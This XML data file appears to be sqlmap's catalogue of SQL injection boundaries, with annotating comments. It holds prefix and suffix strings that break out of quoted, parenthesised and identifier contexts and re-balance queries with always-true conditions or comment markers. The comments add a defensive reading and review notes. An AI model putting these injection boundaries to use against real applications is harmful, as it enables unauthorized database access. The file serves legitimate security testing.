<?xml version="1.0" encoding="UTF-8"?>
<!--
Tag: <boundary>
    How to prepend and append to the test ' <payload><comment> ' string.

    Sub-tag: <level>
        From which level to check for this test.

        Valid values:
            1: Always (<100 requests)
            2: Try a bit harder (100-200 requests)
            3: Good number of requests (200-500 requests)
            4: Extensive test (500-1000 requests)
            5: You have plenty of time (>1000 requests)

    Sub-tag: <clause>
        In which clause the payload can work.

        NOTE: for instance, there are some payloads that do not have to be
        tested as soon as it has been identified whether or not the
        injection is within a WHERE clause condition.

        Valid values:
            0: Always
            1: WHERE / HAVING
            2: GROUP BY
            3: ORDER BY
            4: LIMIT
            5: OFFSET
            6: TOP
            7: Table name
            8: Column name
            9: Pre-WHERE (non-query)

        A comma separated list of these values is also possible.

    Sub-tag: <where>
        Where to add our '<prefix> <payload><comment> <suffix>' string.

        Valid values:
            1: When the value of <test>'s <where> is 1.
            2: When the value of <test>'s <where> is 2.
            3: When the value of <test>'s <where> is 3.

        A comma separated list of these values is also possible.

    Sub-tag: <ptype>
        What is the parameter value type.

        Valid values:
            1: Unescaped numeric
            2: Single quoted string
            3: LIKE single quoted string
            4: Double quoted string
            5: LIKE double quoted string
            6: Identifier (e.g. column name)

    Sub-tag: <prefix>
        A string to prepend to the payload.

    Sub-tag: <suffix>
        A string to append to the payload.

Formats:
    <boundary>
        <level></level>
        <clause></clause>
        <where></where>
        <ptype></ptype>
        <prefix></prefix>
        <suffix></suffix>
    </boundary>

-->
<root>
    <!--
        Boundary catalogue from sqlmap's data/xml/boundaries.xml. Each <boundary> pairs a
        <prefix> that closes the syntactic context the parameter value sits in (quote,
        parenthesis, identifier delimiter) with a <suffix> that re-balances the remainder
        of the original statement.

        Bracketed tokens ([RANDNUM], [RANDSTR], [RANDSTR1], [RANDSTR2], [ORIGINAL],
        [GENERIC_SQL_COMMENT]) are plain text to the XML parser; they are presumably
        substituted by the consuming code before use (that code is not part of this file).
        Leading spaces inside <prefix> and <suffix> are data, so those elements must not be
        re-wrapped or trimmed.

        Defensive reading: every entry depends on request input being concatenated into
        SQL text. A value passed as a bound parameter is never parsed as syntax, so none of
        these contexts applies to it. The re-balancing tails (a value compared with itself,
        a trailing comment marker) are also what appears in request logs when a scanner
        driven by this file probes an application.
    -->

    <!-- Generic boundaries: close the context, then comment out the rest of the statement -->
    <boundary>
        <level>3</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>1</ptype>
        <prefix>)</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>4</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>2</ptype>
        <prefix>')</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>3</level>
        <clause>1,2,3</clause>
        <where>1,2</where>
        <ptype>2</ptype>
        <prefix>'</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>4</ptype>
        <prefix>"</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>
    <!-- End of generic boundaries -->

    <!-- WHERE/HAVING clause boundaries -->
    <!-- Unescaped numeric value nested in one, two or three parentheses -->
    <boundary>
        <level>1</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>1</ptype>
        <prefix>)</prefix>
        <suffix> AND ([RANDNUM]=[RANDNUM]</suffix>
    </boundary>

    <boundary>
        <level>2</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>1</ptype>
        <prefix>))</prefix>
        <suffix> AND (([RANDNUM]=[RANDNUM]</suffix>
    </boundary>

    <boundary>
        <level>3</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>1</ptype>
        <prefix>)))</prefix>
        <suffix> AND ((([RANDNUM]=[RANDNUM]</suffix>
    </boundary>

    <!-- Empty prefix and suffix: the payload is used as is (clause 0, every <where> value) -->
    <boundary>
        <level>1</level>
        <clause>0</clause>
        <where>1,2,3</where>
        <ptype>1</ptype>
        <prefix></prefix>
        <suffix></suffix>
    </boundary>

    <!-- Single quoted string, with and without enclosing parentheses -->
    <boundary>
        <level>1</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>2</ptype>
        <prefix>')</prefix>
        <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
    </boundary>

    <boundary>
        <level>2</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>2</ptype>
        <prefix>'))</prefix>
        <suffix> AND (('[RANDSTR]'='[RANDSTR]</suffix>
    </boundary>

    <boundary>
        <level>3</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>2</ptype>
        <prefix>')))</prefix>
        <suffix> AND ((('[RANDSTR]'='[RANDSTR]</suffix>
    </boundary>

    <boundary>
        <level>1</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>2</ptype>
        <prefix>'</prefix>
        <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
    </boundary>

    <!-- Single quoted string used as a LIKE operand -->
    <boundary>
        <level>2</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>3</ptype>
        <prefix>')</prefix>
        <suffix> AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix>
    </boundary>

    <boundary>
        <level>3</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>3</ptype>
        <prefix>'))</prefix>
        <suffix> AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix>
    </boundary>

    <boundary>
        <level>4</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>3</ptype>
        <prefix>')))</prefix>
        <suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
    </boundary>

    <boundary>
        <level>2</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>3</ptype>
        <prefix>%'</prefix>
        <suffix> AND '[RANDSTR]%'='[RANDSTR]</suffix>
    </boundary>

    <boundary>
        <level>2</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>3</ptype>
        <prefix>'</prefix>
        <suffix> AND '[RANDSTR]' LIKE '[RANDSTR]</suffix>
    </boundary>

    <!-- Double quoted string, with and without enclosing parentheses -->
    <boundary>
        <level>2</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>4</ptype>
        <prefix>")</prefix>
        <suffix> AND ("[RANDSTR]"="[RANDSTR]</suffix>
    </boundary>

    <boundary>
        <level>3</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>4</ptype>
        <prefix>"))</prefix>
        <suffix> AND (("[RANDSTR]"="[RANDSTR]</suffix>
    </boundary>

    <boundary>
        <level>4</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>4</ptype>
        <prefix>")))</prefix>
        <suffix> AND ((("[RANDSTR]"="[RANDSTR]</suffix>
    </boundary>

    <boundary>
        <level>2</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>4</ptype>
        <prefix>"</prefix>
        <suffix> AND "[RANDSTR]"="[RANDSTR]</suffix>
    </boundary>

    <!-- Double quoted string used as a LIKE operand -->
    <boundary>
        <level>3</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>5</ptype>
        <prefix>")</prefix>
        <suffix> AND ("[RANDSTR]" LIKE "[RANDSTR]</suffix>
    </boundary>

    <boundary>
        <level>4</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>5</ptype>
        <prefix>"))</prefix>
        <suffix> AND (("[RANDSTR]" LIKE "[RANDSTR]</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>5</ptype>
        <prefix>")))</prefix>
        <suffix> AND ((("[RANDSTR]" LIKE "[RANDSTR]</suffix>
    </boundary>

    <boundary>
        <level>3</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>5</ptype>
        <prefix>"</prefix>
        <suffix> AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
    </boundary>

    <!-- Unescaped numeric value with no prefix; only the tail of the statement is cut off -->
    <boundary>
        <level>1</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>1</ptype>
        <prefix></prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>3</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>1</ptype>
        <prefix></prefix>
        <suffix># [RANDSTR]</suffix>
    </boundary>

    <!-- e.g. admin' AND [INFERENCE] OR 'foo'='bar' AND password=$password -->
    <boundary>
        <level>3</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>2</ptype>
        <prefix>'</prefix>
        <suffix> OR '[RANDSTR1]'='[RANDSTR2]</suffix>
    </boundary>
    <!-- End of WHERE/HAVING clause boundaries -->

    <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1") -->
    <boundary>
        <level>5</level>
        <clause>9</clause>
        <where>1,2</where>
        <ptype>2</ptype>
        <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>9</clause>
        <where>1,2</where>
        <ptype>2</ptype>
        <prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>4</level>
        <clause>9</clause>
        <where>1,2</where>
        <ptype>1</ptype>
        <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>4</level>
        <clause>9</clause>
        <where>1,2</where>
        <ptype>2</ptype>
        <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>9</clause>
        <where>1,2</where>
        <ptype>4</ptype>
        <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>4</level>
        <clause>9</clause>
        <where>1,2</where>
        <ptype>1</ptype>
        <prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <!-- Pre-WHERE entries that wrap the payload in a concatenated sub-select (<where> 1 only) -->
    <boundary>
        <level>5</level>
        <clause>9</clause>
        <where>1</where>
        <ptype>2</ptype>
        <prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>)||'</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>9</clause>
        <where>1</where>
        <ptype>2</ptype>
        <prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>)||'</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>9</clause>
        <where>1</where>
        <ptype>2</ptype>
        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>)+'</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>9</clause>
        <where>1</where>
        <ptype>2</ptype>
        <prefix>||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>)||</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>9</clause>
        <where>1</where>
        <ptype>2</ptype>
        <prefix>||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>)||</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>9</clause>
        <where>1</where>
        <ptype>1</ptype>
        <prefix>+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>)+</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>9</clause>
        <where>1</where>
        <ptype>2</ptype>
        <prefix>+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>)+</suffix>
    </boundary>
    <!-- End of pre-WHERE generic boundaries -->

    <!-- Pre-WHERE derived table boundaries - e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1" -->
    <!-- NOTE(review): the section is titled pre-WHERE, yet every entry declares <clause>1</clause> (WHERE / HAVING) rather than 9; confirm this is intended -->
    <boundary>
        <level>5</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>2</ptype>
        <prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>2</ptype>
        <prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>1</ptype>
        <prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>4</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>2</ptype>
        <prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>4</ptype>
        <prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>4</level>
        <clause>1</clause>
        <where>1,2</where>
        <ptype>1</ptype>
        <prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>4</level>
        <clause>1</clause>
        <where>1</where>
        <ptype>1</ptype>
        <prefix>` WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>1</clause>
        <where>1</where>
        <ptype>1</ptype>
        <prefix>`) WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>[GENERIC_SQL_COMMENT]</suffix>
    </boundary>
    <!-- End of pre-WHERE derived table boundaries -->

    <!-- Escaped column name (e.g. SELECT `...` FROM table) boundaries -->
    <boundary>
        <level>4</level>
        <clause>8</clause>
        <where>1</where>
        <ptype>6</ptype>
        <prefix>`=`[ORIGINAL]`</prefix>
        <suffix> AND `[ORIGINAL]`=`[ORIGINAL]</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>8</clause>
        <where>1</where>
        <ptype>6</ptype>
        <prefix>"="[ORIGINAL]"</prefix>
        <suffix> AND "[ORIGINAL]"="[ORIGINAL]</suffix>
    </boundary>

    <boundary>
        <level>5</level>
        <clause>8</clause>
        <where>1</where>
        <ptype>6</ptype>
        <prefix>]-(SELECT 0 WHERE [RANDNUM]=[RANDNUM]</prefix>
        <suffix>)|[[ORIGINAL]</suffix>
    </boundary>
    <!-- End of escaped column name boundaries -->

    <!-- Table name boundary (clause 7). NOTE(review): ptype 3 is "LIKE single quoted string" in the header legend; confirm it is the intended type here -->
    <boundary>
        <level>5</level>
        <clause>7</clause>
        <where>1</where>
        <ptype>3</ptype>
        <prefix> [RANDSTR1],</prefix>
        <suffix> [RANDSTR2]</suffix>
    </boundary>

    <!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
    <boundary>
        <level>4</level>
        <clause>1</clause>
        <where>1</where>
        <ptype>2</ptype>
        <prefix>' IN BOOLEAN MODE)</prefix>
        <suffix>#</suffix>
    </boundary>
    <!-- End of AGAINST boolean full-text search boundaries -->
</root>